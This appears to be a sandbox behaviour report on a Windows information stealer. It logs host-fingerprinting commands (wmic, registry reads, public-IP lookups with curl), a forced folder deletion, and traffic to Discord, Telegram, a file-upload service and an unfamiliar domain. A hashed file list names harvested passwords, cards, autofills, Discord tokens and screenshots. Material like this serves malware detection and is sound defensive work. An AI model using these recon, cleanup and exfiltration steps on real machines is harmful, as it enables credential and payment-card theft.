powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| BE | 2.17.196.177:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 177.196.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.filedoge.com | udp |
| DE | 49.13.193.134:443 | api.filedoge.com | tcp |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 134.193.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.77.117.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.myexternalip.com | udp |
| US | 34.117.118.44:443 | www.myexternalip.com | tcp |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | mrbfederali.cam | udp |
| US | 172.67.205.179:443 | mrbfederali.cam | tcp |
| US | 8.8.8.8:53 | 44.118.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 172.67.205.179:80 | mrbfederali.cam | tcp |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | 179.205.67.172.in-addr.arpa | udp |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
| MD5 | 66a65322c9d362a23cf3d3f7735d5430 |
| SHA1 | ed59f3e4b0b16b759b866ef7293d26a1512b952e |
| SHA256 | f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c |
| SHA512 | 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21 |
C:\Users\Admin\AppData\Local\Temp\temp.ps1
| MD5 | 18047e197c6820559730d01035b2955a |
| SHA1 | 277179be54bba04c0863aebd496f53b129d47464 |
| SHA256 | 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3 |
| SHA512 | 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877 |
memory/3780-72-0x00007FF849043000-0x00007FF849045000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aq4wilea.giu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3780-78-0x0000021BB0E30000-0x0000021BB0E52000-memory.dmp
memory/3780-83-0x00007FF849040000-0x00007FF849B01000-memory.dmp
memory/3780-84-0x00007FF849040000-0x00007FF849B01000-memory.dmp
memory/3780-85-0x0000021BCB1F0000-0x0000021BCB234000-memory.dmp
memory/3780-86-0x0000021BCB630000-0x0000021BCB6A6000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\flpgohrl\flpgohrl.cmdline
| MD5 | ab56a349f04b1e31027f2c58bfa705be |
| SHA1 | 2abd8fd5fa718170e9c7cae33bca0e276dc1d0a6 |
| SHA256 | e16117abceb2389623f0c7c0db67eafe369eb9bd6592f2b1d3db65d585ef9f3c |
| SHA512 | ea7fe7d870158295d10a932197153e642806f8f989304d9d95c3072bbf1e72289755af3805664609b3be1ea203e82d38485ea6285a7a6cf30bfe2ddd086f9f12 |
\??\c:\Users\Admin\AppData\Local\Temp\flpgohrl\flpgohrl.0.cs
| MD5 | 7bc8de6ac8041186ed68c07205656943 |
| SHA1 | 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75 |
| SHA256 | 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697 |
| SHA512 | 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba |
\??\c:\Users\Admin\AppData\Local\Temp\flpgohrl\CSCC6924A71820440CDA722ADBB1F6D8DF8.TMP
| MD5 | a6c6bbb20706990e27c03a0322d700e0 |
| SHA1 | bc3e684faf912edef993bffc8c2bd65c2e24dcdf |
| SHA256 | d5a94ef34031ca5f15a883edf58646df6b9fa0bb5cc6ff483e846dfb06705556 |
| SHA512 | ae3868485e0f8603c3d552ec260357d020bc2ad3813d588f8d81b2bd812ada3df39d6f78991195bb086bbc75459bc4044234a06da75f671575f8b2d730eb6602 |
C:\Users\Admin\AppData\Local\Temp\RES5A93.tmp
| MD5 | 0017610a01cb34f0215ef062dc2748a8 |
| SHA1 | 67d54676bad6758846042a8164d5aa54c768c2a0 |
| SHA256 | d4deed446ea8e19ce25218b70ef25c12b93ff68b4151e7b8f0751da3996f35b4 |
| SHA512 | c1c8f91d262b6fb702ee16b8478a874049f5a888900914b7722232e1bfaebd5e66eadc420b10896580b00bf680611199b81e9ff966f62fd7621190d489aea8f1 |
memory/3780-99-0x0000021BB09C0000-0x0000021BB09C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\flpgohrl\flpgohrl.dll
| MD5 | df8387645da2f3cce8c379b20183039a |
| SHA1 | 889a56a4d4075e077f22921c1620230ad83f48b3 |
| SHA256 | 176f946e70a599edd477b50c551f36db3cc4d7d954085aa4477fd1d6166883e9 |
| SHA512 | 6b1531d92d2d1928d05d409251da6949a2fe27d6533aafa3fcae9a9f565dbbdc7a310732199bcb1a1a523bca1e67ed57cd4dcf86203224b5361afecdf9eec120 |
memory/3780-103-0x00007FF849040000-0x00007FF849B01000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3f01549ee3e4c18244797530b588dad9 |
| SHA1 | 3e87863fc06995fe4b741357c68931221d6cc0b9 |
| SHA256 | 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a |
| SHA512 | 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50 |
memory/3276-115-0x0000022169920000-0x0000022169970000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2c9b93d38222869d090f809ed4513a80 |
| SHA1 | 88eea1ce1162e12a461e4b4559cf84de14fe4db6 |
| SHA256 | ba3b84f9ba258a7d95da48afdc6c67e493a99810a2d912487884b91fdbd2b157 |
| SHA512 | 9fb0486a49f7866710836735fd930287f29d715c4a77abb21f3b902d3062f655300c8aae7d5a0fb621bb7b44bd5075e26945a8e8505dbcf7c86e9362bb04cb2a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 25df8b13c12b231e5417dd1d60829aed |
| SHA1 | c57a0e7929982a84daa0a0caadc534c00191a458 |
| SHA256 | 88c71be7eeb45a51b1ec4726f433530563e95dc2ee5889daf3755c6e3bf5b301 |
| SHA512 | 3620d93ef78f2e66a3cf3ab3b5344bc1646666c1f32092c89c0e79236dca31ced6e83a04ffefe651107c6874f8ead3bea4269873a8a650d9b8556107755f3cb3 |
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | a8834c224450d76421d8e4a34b08691f |
| SHA1 | 73ed4011bc60ba616b7b81ff9c9cad82fb517c68 |
| SHA256 | 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5 |
| SHA512 | 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596 |
C:\ProgramData\edge\Updater\RunBatHidden.vbs
| MD5 | 14a9867ec0265ebf974e440fcd67d837 |
| SHA1 | ae0e43c2daf4c913f5db17f4d9197f34ab52e254 |
| SHA256 | cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1 |
| SHA512 | 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54 |
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat
| MD5 | 93f90bda499e44e7497ed86627232b18 |
| SHA1 | 711d3ed2e1d427dd6633ac3f1f258382694ac050 |
| SHA256 | e396e532af9adbdce7bf1f018313422779f32e750bc8193131525922334821c2 |
| SHA512 | edc2522ce9afef5bbaf9b89990ecb0913fe5d033979c1015682aa2fecde84bf4d757a484d744cf1bad78904e512b9b9632f3beedba1a743a13719216b0adfb4f |
\??\c:\Users\Admin\AppData\Local\Temp\krkmaasn\krkmaasn.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\krkmaasn\krkmaasn.cmdline
| MD5 | a6761d6679d0ce5c2a920b2f280f0ed4 |
| SHA1 | 732fa4ef9ca2953ff241be83a31e8b122267c599 |
| SHA256 | dbf6c3d8f981b74f7020e36953395c13b9895cdbb813c67fc66cae6e12cb1092 |
| SHA512 | 3f6e4d54e377c501c87f21d1200987d2c923266fa099b3b60a8a3b1918d4c5786341f0ca1895e267b276c07b5d99a9aa49dd16bf2274434bd4b3b5ef9a2efa65 |
\??\c:\Users\Admin\AppData\Local\Temp\krkmaasn\CSC44B74D884DAD4622A95BCBBE83DD942.TMP
| MD5 | 59e15ebd26fa5082b65280ef0a93eccb |
| SHA1 | de0a66f5f1e07e8a5bd65f8d716ee3b9b0a2bc3e |
| SHA256 | bf103c1295c11d105d5017319d89775f3638c506fd5d782cc684c40e2ee0a9e6 |
| SHA512 | 7127b7b92109d3328d32427cb87ea45194c08f9d79577ab5edabe36504da8bef773866da857768a23ac5f870f19e9b7bc08ddd7f815ee3ad17825432787a998f |
C:\Users\Admin\AppData\Local\Temp\RES6234.tmp
| MD5 | b809b1c035eb6814be5c13a65fb58eeb |
| SHA1 | 377e1a49dfe003eb3017c783f781a689a1c6c272 |
| SHA256 | 05cda0a6570ad80f4334c3b7d962dd07f68b20725bc9097b4dd4abe4e53c600a |
| SHA512 | b81822cde82b2f5e46abd5a0c4a9417ee1572884b0b34006f12ba9820a75cb75d2748fda86a13aa3a5604f0c6ede98137f8e347da02c8671c962ef64d933d01a |
memory/3368-187-0x000001E43C9D0000-0x000001E43C9D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\krkmaasn\krkmaasn.dll
| MD5 | 9baa0df12803f82283279687bd6b8d0b |
| SHA1 | 116578b17ca654f68ea9eec33b77599e89f00f71 |
| SHA256 | 043f7b7fdcd69eca59925dc251b3a70118ca15853b3fc124e02fd9abc680e2d8 |
| SHA512 | 344a976598a52a0d25c6be2a251479fc68a513c9d9474733cdd4eff4577ac0dd149e2f63ecbd5b818001c695b5fbcb91d23ad9f2f9e15c76b05f19afe210fb2a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 63c760db3618dea9753509d96a7b0628 |
| SHA1 | 5dd25f1a3b25068679a6b4255500383dc1e3c6be |
| SHA256 | 3d55aedc66fe55420c0bee9b388494902ea61ed6a7887f9ae6412ff924015d85 |
| SHA512 | 0bbc5ac692e7fbe6d1d488a32179754349218175b25bc71c8d576a42cf18dc64409f17e150af02eae2e1ac4ddf463bd4429bfc5e6d9f5c531d854b1ea86f1b68 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 34f595487e6bfd1d11c7de88ee50356a |
| SHA1 | 4caad088c15766cc0fa1f42009260e9a02f953bb |
| SHA256 | 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d |
| SHA512 | 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dcfe1f94aa15e3ca618b4c5002c9c055 |
| SHA1 | b8abdaf68684bc49756086840035b93f79329892 |
| SHA256 | cf11bfe8cd92fd4293ae0bd884f2c3d397e68d54ea03352027ed6b6c93e8630d |
| SHA512 | bce3736f22af50ef73c7ca17942eebddc00ea5b216fa9ad8c704fb6b5c0cc8d0b8aa992fc47270148c23d8257ba2ab9cae079ca239abebef7a92182941f8a73c |
C:\ProgramData\Steam\Launcher\EN-Objiyuie\stolen_files.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
C:\ProgramData\Steam\Launcher\EN-Objiyuie\Serial-Check.txt
| MD5 | d7a9f9bdb36aa49f7ff3d5e264f3afd2 |
| SHA1 | e1127d5225386f9b3768c019444c79dbdf794361 |
| SHA256 | 0a0a1afa36b28144d91ca35b6e59e614fd3c61ba86b850d7cb307ce88e711e93 |
| SHA512 | fbb0fbc72f6da52006db2ba90e8ac1f4cf7ebfc7421315cbe9b2509a875d8c236d950c4058288836a9ea454516c59225544bfa80e589b64bd90999b92a86950c |
C:\ProgramData\Steam\Launcher\EN-Objiyuie\Passwords\Passwords.txt
| MD5 | c5e74f3120dbbd446a527e785dfe6d66 |
| SHA1 | 11997c2a53d19fd20916e49411c7a61bfb590e9c |
| SHA256 | e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05 |
| SHA512 | a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f |
C:\ProgramData\Steam\Launcher\EN-Objiyuie\Discord\discord.txt
| MD5 | 675951f6d9d75fd2c9c06b5ff547c6fd |
| SHA1 | 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09 |
| SHA256 | 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244 |
| SHA512 | 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea |
C:\ProgramData\Steam\Launcher\EN-Objiyuie\debug.log
| MD5 | 81b0d5097c749b3667998b82da5e370b |
| SHA1 | c39a499acb3a7cf36952d825ed5561fd97a19fdc |
| SHA256 | 457365bfff4b9c656296864fc55a2b92ca4f2bb4320eec0c0ff440c63a208e70 |
| SHA512 | 7842057b02404da086bffb1d00edcafe63666fc3eaeb857221db0ca0d5637f3bb2fd8dfa013e9fcfa425b66da88bc06037b01ed3d3fb1ae617e994b9c9f6e886 |
C:\ProgramData\Steam\Launcher\EN-Objiyuie\Autofills\Autofills.txt
| MD5 | 2f308e49fe62fbc51aa7a9b987a630fe |
| SHA1 | 1b9277da78babd9c5e248b66ba6ab16c77b97d0b |
| SHA256 | d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521 |
| SHA512 | c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024 |
C:\ProgramData\Steam\Launcher\EN-Objiyuie\Cards\Cards.txt
| MD5 | 8a0ed121ee275936bf62b33f840db290 |
| SHA1 | 898770c85b05670ab1450a96ea6fbd46e6310ef6 |
| SHA256 | 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709 |
| SHA512 | 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1
| MD5 | 086af06833bc148f73d5b243dbcfc69c |
| SHA1 | 5e1c0045d6ee0755efb9a2cfa517c4d99b36f591 |
| SHA256 | 7879acdaad68064251eb5120be9fc1d1dc0d9bf0300f48e7117272c7d5cd2944 |
| SHA512 | 24ad3954b8f9d4f2dc7b9aeda27b69e14001dafdf9b29ffb78f68c085d2b0e7dc2a69c0e26c38f09530b68c158f9a2593525ba9b98162479b287d9dcd666fb39 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ca24df1817fa1aa670674846e5d41614 |
| SHA1 | dac66ea013bcc46d24f1ece855568187c6080eaf |
| SHA256 | 3b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db |
| SHA512 | fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631 |
C:\ProgramData\Steam\Launcher\EN-Objiyuie.zip
| MD5 | cf0c24c9d782577aba0abf62ea22a7e1 |
| SHA1 | 6b1f1e836d1432910074e9c96dd611e43de1a0f3 |
| SHA256 | 6eae9d2257887ef064bb16a656966f2544f9a65dc7503c1539aae298314b3a84 |
| SHA512 | ebefa303c02c166a03d0a02efba3e8de09c17f25d42e700885738a5924432f3c5a55151743b2785af22165a1070cad9ef307bf55f7258df88bd42e89f40e154c |
C:\ProgramData\Steam\Launcher\EN-Objiyuie\Screenshots\Screenshot.png
| MD5 | 1037a62a9814e96e51615faac220c30c |
| SHA1 | 97b083314659cdb156d7eb08c9b04df5fb098608 |
| SHA256 | 519af148f2b5991f589ddb64297fb40695b5a12d1bcecb8f67298b245e663582 |
| SHA512 | 63d4363d2939aa4befd8d63408f2552f624d0df2cd2d07a471f0848c3ba171fb22c5c9a15e35cd02b31a4b42f850166e684952e71fe6a1a5e40d966cc76904a0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 50a8221b93fbd2628ac460dd408a9fc1 |
| SHA1 | 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6 |
| SHA256 | 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e |
| SHA512 | 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0 |